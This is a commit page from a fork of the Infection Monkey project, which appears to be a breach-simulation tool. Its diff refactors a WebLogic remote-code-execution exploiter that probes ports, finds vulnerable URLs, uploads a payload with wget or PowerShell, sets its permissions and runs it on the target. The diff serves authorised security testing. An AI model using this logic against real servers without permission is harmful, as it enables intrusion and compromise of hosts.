p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Webblogic refactored to web RCE framework changes(from static methods into class methods)

This commit is contained in:
Vakaris 2018-08-17 13:46:14 +03:00
parent 66bc852742
commit 10528c313d
1 changed files with 10 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
infection_monkey/exploit/weblogic.py
View File

@ -10,7 +10,7 @@ from requests import post, exceptions
from web_rce import WebRCE from web_rce import WebRCE
from exploit.tools import get_free_tcp_port, get_interface_to_target from exploit.tools import get_free_tcp_port, get_interface_to_target
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from model import POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, WGET_HTTP_UPLOAD from model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD
import threading import threading
import logging import logging
@ -46,17 +46,17 @@ class WebLogicExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host): def __init__(self, host):
super(WebLogicExploiter, self).__init__(host) super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
'win32': 'monkey-32.exe',
'win64': 'monkey-64.exe'})
def exploit_host(self): def exploit_host(self):
# Get open ports # Get open ports
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"]) ports = self.get_ports_w(self.HTTP, ["http"])
if not ports: if not ports:
return False return False
# Get urls to try to exploit # Get urls to try to exploit
urls = WebRCE.build_potential_urls(self.host, ports, URLS) urls = self.build_potential_urls(ports, URLS)
exploiter = self.exploit
# Checking takes a lot of time, so we check until we get exploitable url and stop # Checking takes a lot of time, so we check until we get exploitable url and stop
vulnerable_urls = [] vulnerable_urls = []
@ -69,24 +69,16 @@ class WebLogicExploiter(WebRCE):
if not vulnerable_urls: if not vulnerable_urls:
return False return False
# Somehow we can't save files outside server's directory data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = 'monkey-32.exe'
config.dropper_target_path_win_64 = 'monkey-64.exe'
config.dropper_target_path_linux = './monkey.sh'
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0],
{'windows': POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED,
'linux': WGET_HTTP_UPLOAD})
# We can't use 'if not' because response may be '' # We can't use 'if not' because response may be ''
if not data or data['response'] == False: if not data or data['response'] is False:
return False return False
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: if self.change_permissions(vulnerable_urls[0], data['path']) is False:
return False return False
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], False) == False: if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
return False return False
return True return True